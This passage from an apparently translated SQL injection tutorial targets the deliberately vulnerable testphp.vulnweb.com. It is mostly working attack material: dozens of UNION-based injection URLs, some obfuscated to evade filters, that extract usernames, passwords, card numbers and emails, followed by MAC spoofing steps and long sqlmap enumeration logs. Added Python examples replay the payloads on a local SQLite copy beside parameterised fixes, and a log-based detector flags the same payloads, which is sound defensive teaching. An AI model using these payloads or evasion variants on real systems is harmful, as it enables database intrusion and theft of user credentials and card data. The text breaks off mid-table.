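    """Hardened handler: validate the type first, then bind the integer. The
    database never receives SQL text from the user, only a number."""
    try:
        artist_id = int(artist_param)
    except ValueError:
        raise ValueError("artist must be an integer id") from None
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=?"
    return conn.execute(sql, (artist_id,)).fetchall()


def probe(conn, handler, artist_param):
    """Run a handler and report what the page's tester would observe: either
    the rows returned or the class of error raised."""
    try:
        return ("rows", handler(conn, artist_param))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)


# The walkthrough's final payload; SQLite's || replaces MySQL's concat(uname,0x3a,pass)
UNION_PAYLOAD = "100 union all select 1,2,uname||':'||pass from users"

if __name__ == "__main__":
    conn = open_lab_db()
    for handler in (artist_vulnerable, artist_bound_as_text, artist_parameterized):
        print(handler.__name__)
        print("  artist=1            ->", probe(conn, handler, "1"))
        print("  artist=1'           ->", probe(conn, handler, "1'"))  # the quote test
        print("  artist=100 union... ->", probe(conn, handler, UNION_PAYLOAD))
```

Run against the vulnerable handler, the three inputs reproduce the page's observations: the trailing quote produces a database error, and a non-existent id plus UNION makes column 3 carry the users rows. Against the bound handler the same payloads match nothing, and the validating handler rejects them before any SQL runs while still serving artist=1.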

07 - Some more manual injection command examples


Type the line below as a single line:

http://testphp.vulnweb.com/artists.php?artist=100
     union select 1,2,concat('Versao ===> ',' :: ',version())--




----------------------------------------------

Type the line below as a single line:

http://testphp.vulnweb.com/artists.php?artist=100
     union select 1,2,(select+count(column_name) from information_schema.columns)

----------------------------------------------

Type the line below as a single line:

http://testphp.vulnweb.com/artists.php?artist=100
     union select 1,2,(select count(table_name) from information_schema.tables)


http://testphp.vulnweb.com/artists.php?artist=100
     union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
     FROM information_schema.columns WHERE table_schema=database() 
     GROUP BY table_name LIMIT 0,1


http://testphp.vulnweb.com/artists.php?artist=100
     /*!50000uNiOn*/ /*!50000select*/ all 1,2,/*!50000 group_concat(table_name)*/
     /*!50000from*/ information_schema.tables where table_schema=database()


http://testphp.vulnweb.com/artists.php?artist=100 /*!50000uNiOn*/
     /*!50000select*/ all 1,2,/*!50000 gRoUp_cOnCat(table_name,0x3c62723e)*/ /*!50000
     from*/ information_schema.tables where table_schema=database()


http://testphp.vulnweb.com/artists.php?artist=100
     union select 1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)
     where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)



Vuln column: 3

http://testphp.vulnweb.com/artists.php?artist=-1
     /*!50000union*/ /*!50000select*/ 1,2,database()

http://testphp.vulnweb.com/artists.php?artist=-1
     /*!50000union*/ /*!50000select*/ 1,2,user()

http://testphp.vulnweb.com/artists.php?artist=-1
     union select 1,pass,cc FROM users WHERE uname='test'


Vuln column: 7

http://testphp.vulnweb.com/listproducts.php?cat=3
     UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
     union all select 1,2,3,4,5,6,'<< Coluna 7 esta vulneravel >>',8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
      and 1 = 0 union select 1,2,3,4,5,6,version(),8,9,10,11-- -


Vuln columns: 7 and 11

http://testphp.vulnweb.com/listproducts.php?cat=-1
    union select 1,2,3,4,5,6,version(),8,9,10,user()

http://testphp.vulnweb.com/listproducts.php?cat=3
     /*!50000%55nIoN*/ /*!50000%53eLeCt*/ 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
     /**//*!12345UNION SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
     /*--*/union/*--*/select/*--*/ 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
     /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
     /**/union/*!50000select*//**/ 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=-1
     union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from 
    information_schema.columns where table_schema=database() and table_name='users'--+

http://testphp.vulnweb.com/listproducts.php?cat=-1
     union all select 1,group_concat('User : ',uname,' Password: ',pass,
     ' CC: ',cc,' Email: ',email),3,4,5,6,7,8,9,10,11 from users--+

http://testphp.vulnweb.com/listproducts.php?cat=-1
     union select 'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8',
     'vuln9','vuln10','vuln11'


Vuln column: 1 3 7 9

http://testphp.vulnweb.com/product.php?pic=-1
      and 1 = 0 union select 1,'Vuln 2','Vuln 3',4,5,6,'Vuln 7',8,'Vuln 9',10,11--


http://testphp.vulnweb.com/product.php?pic=-1
      and 1 = 0 union select 1,version(),user(),4,5,6,'Vuln 7===',8,database(),10,11--




http://testphp.vulnweb.com/product.php?pic=-1
     and 1 = 0 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11
     FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 115)--


http://testphp.vulnweb.com/listproducts.php?cat=-1
      union select 1,2,3,4,5,6,concat(uname,0x3a,pass,0x3a,email,0x3a,name),8,9,10,11
      from users
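The payloads above all rely on the same two facts: the artist/cat/pic value is pasted straight into the SQL text, and a UNION whose column count matches the original SELECT makes the page render rows from any other table. Below is an added example, not code from the original page, that replays that sequence (ORDER BY column counting, table enumeration, then the artist=-1 union select 1,pass,cc FROM users WHERE uname='test' extraction) against an in-memory SQLite copy of the acuart schema, next to the parameterised form of the same query that defeats it. Table and column names follow the page (artists, users, uname, pass, cc); the row contents are constructed sample data, and SQLite's sqlite_master stands in for MySQL's information_schema.

```python
"""
Added example (not from the original page): UNION-based extraction replayed
against a local SQLite copy of the acuart schema, beside the hardened query.
Row contents are constructed sample data.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory database shaped like the part of acuart the payloads touch."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE artists (artist_id INTEGER, aname TEXT, adesc TEXT);
        CREATE TABLE users   (uname TEXT, pass TEXT, cc TEXT, email TEXT);
        INSERT INTO artists VALUES (1, 'artist one', 'constructed description');
        INSERT INTO users   VALUES ('test', 'test', '4111-1111-1111-1111',
                                    'test@example.com');
        """
    )
    return con


def artists_page_vulnerable(con, artist_param: str):
    """The pattern behind artists.php?artist=: the GET value is pasted into
    the SQL text, so whatever follows the number becomes part of the statement."""
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=" + artist_param
    return con.execute(sql).fetchall()


def artists_page_fixed(con, artist_param: str):
    """Hardened form: the value is bound as a parameter and is never parsed as
    SQL, so 'UNION SELECT ...' is just a string that matches no artist_id."""
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=?"
    return con.execute(sql, (artist_param,)).fetchall()


def find_column_count(page, con, max_cols: int = 20):
    """Column counting with ORDER BY n: the query keeps working while n is at
    most the number of selected columns and errors once n exceeds it (sqlmap
    calls this the 'ORDER BY technique').  Returns None when no probe ever
    errors, i.e. the parameter is not injectable this way."""
    for n in range(1, max_cols + 1):
        try:
            page(con, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


# Same idea as artist=-1 union select 1,pass,cc FROM users WHERE uname='test':
# a non-existent id empties the first SELECT so only the UNION rows render,
# and the three values line up with artist_id, aname, adesc.
PAYLOAD_CREDS = "-1 UNION SELECT 1, pass, cc FROM users WHERE uname='test'"

# Table enumeration: information_schema.tables on MySQL, sqlite_master here.
PAYLOAD_TABLES = ("-1 UNION SELECT 1, group_concat(name), 3 "
                  "FROM sqlite_master WHERE type='table'")


def extracted_tables(con) -> set:
    """Table names leaked through the second column of the rendered row."""
    rows = artists_page_vulnerable(con, PAYLOAD_TABLES)
    return set(rows[0][1].split(","))


if __name__ == "__main__":
    db = build_db()
    print("columns (vulnerable):", find_column_count(artists_page_vulnerable, db))
    print("columns (fixed):     ", find_column_count(artists_page_fixed, db))
    print("tables via UNION:    ", extracted_tables(db))
    print("creds (vulnerable):  ", artists_page_vulnerable(db, PAYLOAD_CREDS))
    print("creds (fixed):       ", artists_page_fixed(db, PAYLOAD_CREDS))
```

The fixed version still answers a normal request (artist=1 returns the artist row, because the bound "1" is compared numerically), but every probe and payload above returns an empty result instead of an error or a foreign row, which is exactly why sqlmap's ORDER BY and UNION tests fail against it.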

08 - Kali Linux - Downloading and Installing

Kali Linux is an advanced operating system (OS) with many tools for security testing
(penetration testing); these tests are done to find flaws in operating systems,
networks, web applications and much more. It is entirely based on Debian, another
Linux distribution.

Its predecessor was BackTrack Linux. Kali Linux was the rebirth of BackTrack; the new
Kali Linux came with the goal of being the most robust, advanced and stable
distribution for penetration testing, shipping more than 300 tools and a modified
kernel, while remaining fully customisable.


Let's download Kali so we can redo the manual injection examples, this time with
Kali's sqlmap tool.

https://www.kali.org/

https://www.kali.org/downloads/



Downloading Kali Linux image file ( iso )



Watch the step-by-step video showing how to install Kali in your VirtualBox.

I have already shown the step-by-step installation of Debian Linux, so it is exactly
the same way with Kali. :)



Username: root


Password: 123




Click the icon on the left-hand side to open the terminal.

If you prefer to reach the terminal through PuTTY or the macOS terminal, start the
ssh service first (this line is not needed when you work directly in the Kali
terminal):

service ssh start

Check the IP address of the VM:

ifconfig

Update the system:

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

09 - Kali - Sqlmap

Now let's reproduce the "Manual SQL Injection" example using the sqlmap tool from
Kali Linux.


 SqlMap 

sqlmap is a SQL injection tool written in Python. Its purpose is to detect and
exploit SQL injection vulnerabilities in web applications and sites. Once one or
more injections are found on a target, the user can choose among the many options
sqlmap offers to explore the data stored in that system's database, such as
extracting the list of users, passwords, privileges, tables and much more.


----------------------------------------------


Law 12.737/2012, Art. 154-A

Breaking into another person's computing device, whether or not connected to a
computer network, by improperly circumventing a security mechanism, with the purpose
of obtaining, tampering with or destroying data or information without the express
or tacit authorisation of the device's owner, or installing vulnerabilities to obtain
an unlawful advantage:

Penalty: detention of 3 (three) months to 1 (one) year, and a fine.

Law No. 12.737, of 30 November 2012.


----------------------------------------------


In the Kali terminal, type the commands below to change the MAC address. Keep in mind
that the MAC address is only visible on the local network segment; changing it does
not alter what a remote web server such as testphp.vulnweb.com sees.


 ifconfig eth0 down 


 macchanger -m 02:33:4A:B5:6C:D7   eth0 

Permanent MAC: e8:94:f6:1c:0e:8b (unknown)
Current   MAC: 02:33:4a:b5:6c:e7 (unknown)
New       MAC: 02:33:4a:b5:6c:d7 (unknown)

 ifconfig eth0 up 


In practice...




----------------------------------------------


Let's use the Kali Linux tool called sqlmap to find the SQL injection
vulnerabilities.


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"

      _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Developers assume no liability and are not responsible for any misuse
or damage caused by this program

[*] starting at 21:25:44

[21:25:45] [INFO] testing connection to the target URL
[21:25:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:25:46] [INFO] testing if the target URL is stable
[21:25:47] [INFO] target URL is stable
[21:25:47] [INFO] testing if GET parameter 'artist' is dynamic
[21:25:47] [INFO] confirming that GET parameter 'artist' is dynamic
[21:25:48] [INFO] GET parameter 'artist' is dynamic
[21:25:48] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be
injectable (possible DBMS: 'MySQL')
[21:25:48] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific
 for other DBMSes? [Y/n]   y 
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n]  y 
[21:25:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:26:02] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind -
WHERE or HAVING clause' injectable
[21:26:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause'
[21:26:02] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause'
[21:26:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:26:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:26:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (UPDATEXML)'
[21:26:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (UPDATEXML)'
[21:26:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXP)'
[21:26:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[21:26:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:26:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause
(BIGINT UNSIGNED)'
[21:26:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[21:26:06] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[21:26:07] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:26:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:26:10] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:26:10] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:26:11] [INFO] testing 'MySQL inline queries'
[21:26:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:26:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[21:26:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:26:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[21:26:24] [INFO] GET parameter 'artist' seems to be 'MySQL >= 5.0.12 AND time-based
blind (SELECT)' injectable
[21:26:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:26:24] [INFO] automatically extending ranges for UNION query injection technique
tests as there is at least one other (potential) technique found
[21:26:26] [INFO] ORDER BY technique seems to be usable. This should reduce the time
needed to find the right number of query columns.
Automatically extending the range for current UNION query injection technique test
[21:26:27] [INFO] target URL appears to have 3 columns in query
[21:26:33] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20
columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]  n 
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[21:26:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[21:26:43] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 21:26:43
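The run above leaves a very recognisable trail in the web server's access log (sqlmap itself reports the target runs Nginx): a numeric comparison, a SLEEP() call and a UNION ALL SELECT with hex-encoded markers, all in the artist parameter. As an added example, not part of the original page or of sqlmap, here is a small detector that reads access-log lines, URL-decodes the query string, unwraps the MySQL /*!NNNNN ... */ version comments used by the obfuscated payloads in section 07 (MySQL executes their body, so "union" is what the database sees), and flags the payload families shown above. The log lines are constructed, with documentation-range client addresses.

```python
"""
Added example (not from the original page or from sqlmap): flag sqlmap-style
SQL injection probes in access-log lines.  Sample log lines are constructed.
"""
import re
from urllib.parse import unquote_plus

# /*!50000uNiOn*/ is executed by MySQL as UNION: keep the body, drop the wrapper.
VERSION_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

INDICATORS = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "boolean-compare": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b"),
    "time-based": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "schema-enum": re.compile(r"\binformation_schema\b"),
    "hex-literal": re.compile(r"\b0x[0-9a-f]{8,}\b"),
}

# nginx/apache combined format: ip ident user [time] "method target proto" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(raw: str) -> str:
    """Undo the encodings the payloads above rely on, then lowercase."""
    s = raw
    for _ in range(2):          # %55nIoN and double-encoded variants such as %2553
        s = unquote_plus(s)     # also turns select+count into select count
    s = VERSION_COMMENT.sub(r" \1 ", s)
    s = PLAIN_COMMENT.sub(" ", s)   # /**/ and /*--*/ separators
    return re.sub(r"\s+", " ", s).strip().lower()


def classify(target: str) -> list:
    """Names of the indicator patterns present in the request's query string."""
    _, _, query = target.partition("?")
    if not query:
        return []
    norm = normalize(query)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]


def scan(log_text: str) -> list:
    """One record per request whose query string matches at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        found = classify(m["target"])
        if found:
            hits.append({"ip": m["ip"], "time": m["time"],
                         "target": m["target"], "indicators": found})
    return hits


# Constructed sample: a normal browse per client, then the probes seen above.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Jun/2016:21:25:47 -0400] "GET /artists.php?artist=1 HTTP/1.1" 200 4823 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Jun/2016:21:26:02 -0400] "GET /artists.php?artist=1%20AND%205701%3D5701 HTTP/1.1" 200 4823 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Jun/2016:21:26:24 -0400] "GET /artists.php?artist=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nzIE) HTTP/1.1" 200 4823 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Jun/2016:21:26:33 -0400] "GET /artists.php?artist=-9846%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7178706271,0x574756745364796459,0x7171786271)--%20- HTTP/1.1" 200 4823 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jun/2016:22:40:01 -0400] "GET /listproducts.php?cat=3%20/*!50000%55nIoN*/%20/*!50000%53eLeCt*/%201,2,3,4,5,6,7,8,9,10,11--%20- HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jun/2016:22:41:15 -0400] "GET /listproducts.php?cat=2 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["time"], hit["indicators"], hit["target"])
```

Only GET parameters are visible in a standard access log; the same probes sent in a POST body or a header need request logging at the application or WAF layer. The normalisation step is what matters against the /*!50000*/ and %55nIoN variants from section 07: a rule that looks for the literal string "union" in the raw request line misses all of them.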


----------------------------------------------


Let's list the databases.


 --dbs   = list databases


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 21:59:28

[21:59:28] [INFO] resuming back-end DBMS 'mysql'
[21:59:29] [INFO] testing connection to the target URL
[21:59:30] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[21:59:30] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[21:59:30] [INFO] fetching database names
[21:59:30] [INFO] the SQL query used returns 2 entries
[21:59:30] [INFO] resumed: information_schema
[21:59:30] [INFO] resumed: acuart
available databases [2]:
[*] acuart
[*] information_schema

[21:59:30] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 21:59:30


----------------------------------------------


-D        = acuart  ( the database )

--tables  = list tables


----------------------------------------------


Listing all tables of the acuart database.


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables

         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 22:02:11

[22:02:11] [INFO] resuming back-end DBMS 'mysql'
[22:02:11] [INFO] testing connection to the target URL
[22:02:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:02:15] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:02:15] [INFO] fetching tables for database: 'acuart'
[22:02:15] [INFO] the SQL query used returns 8 entries
[22:02:15] [INFO] resumed: artists
[22:02:15] [INFO] resumed: carts
[22:02:15] [INFO] resumed: categ
[22:02:15] [INFO] resumed: featured
[22:02:15] [INFO] resumed: guestbook
[22:02:15] [INFO] resumed: pictures
[22:02:15] [INFO] resumed: products
[22:02:15] [INFO] resumed: users

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[22:02:15] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 22:02:15

----------------------------------------------

Listing all tables and columns of the acuart database.


--tables  = list tables

--columns = list columns


----------------------------------------------


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --columns
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 22:15:25

[22:15:25] [INFO] resuming back-end DBMS 'mysql'
[22:15:25] [INFO] testing connection to the target URL
[22:15:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:15:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:15:27] [INFO] fetching tables for database: 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: artists
[22:15:27] [INFO] resumed: carts
[22:15:27] [INFO] resumed: categ
[22:15:27] [INFO] resumed: featured
[22:15:27] [INFO] resumed: guestbook
[22:15:27] [INFO] resumed: pictures
[22:15:27] [INFO] resumed: products
[22:15:27] [INFO] resumed: users

Database: acuart

[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[22:15:27] [INFO] fetching columns for table 'artists' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "artist_id","int(5)"
[22:15:27] [INFO] resumed: "aname","varchar(50)"
[22:15:27] [INFO] resumed: "adesc","text"
[22:15:27] [INFO] fetching columns for table 'carts' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "cart_id","varchar(100)"
[22:15:27] [INFO] resumed: "price","int(11)"
[22:15:27] [INFO] resumed: "item","int(11)"
[22:15:27] [INFO] fetching columns for table 'categ' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "cat_id","int(5)"
[22:15:27] [INFO] resumed: "cname","varchar(50)"
[22:15:27] [INFO] resumed: "cdesc","tinytext"
[22:15:27] [INFO] fetching columns for table 'featured' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 2 entries
[22:15:27] [INFO] resumed: "pic_id","int(11)"
[22:15:27] [INFO] resumed: "feature_text","text"
[22:15:27] [INFO] fetching columns for table 'guestbook' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "sender","varchar(150)"
[22:15:27] [INFO] resumed: "mesaj","text"
[22:15:27] [INFO] resumed: "senttime","int(32)"
[22:15:27] [INFO] fetching columns for table 'pictures' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: "pic_id","int(5)"
[22:15:27] [INFO] resumed: "pshort","mediumtext"
[22:15:27] [INFO] resumed: "plong","text"
[22:15:27] [INFO] resumed: "price","int(11)"
[22:15:27] [INFO] resumed: "cat_id","int(11)"
[22:15:27] [INFO] resumed: "a_id","int(11)"
[22:15:27] [INFO] resumed: "title","varchar(100)"
[22:15:27] [INFO] resumed: "img","varchar(50)"
[22:15:27] [INFO] fetching columns for table 'products' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 5 entries
[22:15:27] [INFO] resumed: "id","int(10) unsigned"
[22:15:27] [INFO] resumed: "name","text"
[22:15:27] [INFO] resumed: "rewritename","text"
[22:15:27] [INFO] resumed: "description","text"
[22:15:27] [INFO] resumed: "price","int(10) unsigned"
[22:15:27] [INFO] fetching columns for table 'users' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: "uname","varchar(100)"
[22:15:27] [INFO] resumed: "pass","varchar(100)"
[22:15:27] [INFO] resumed: "cc","varchar(100)"
[22:15:27] [INFO] resumed: "address","mediumtext"
[22:15:27] [INFO] resumed: "email","varchar(100)"
[22:15:27] [INFO] resumed: "name","varchar(100)"
[22:15:27] [INFO] resumed: "phone","varchar(100)"
[22:15:27] [INFO] resumed: "cart","varchar(100)"

Database: acuart
Table: categ

[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| cat_id | int(5)      |
| cdesc  | tinytext    |
| cname  | varchar(50) |
+--------+-------------+

Database: acuart
Table: users

[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
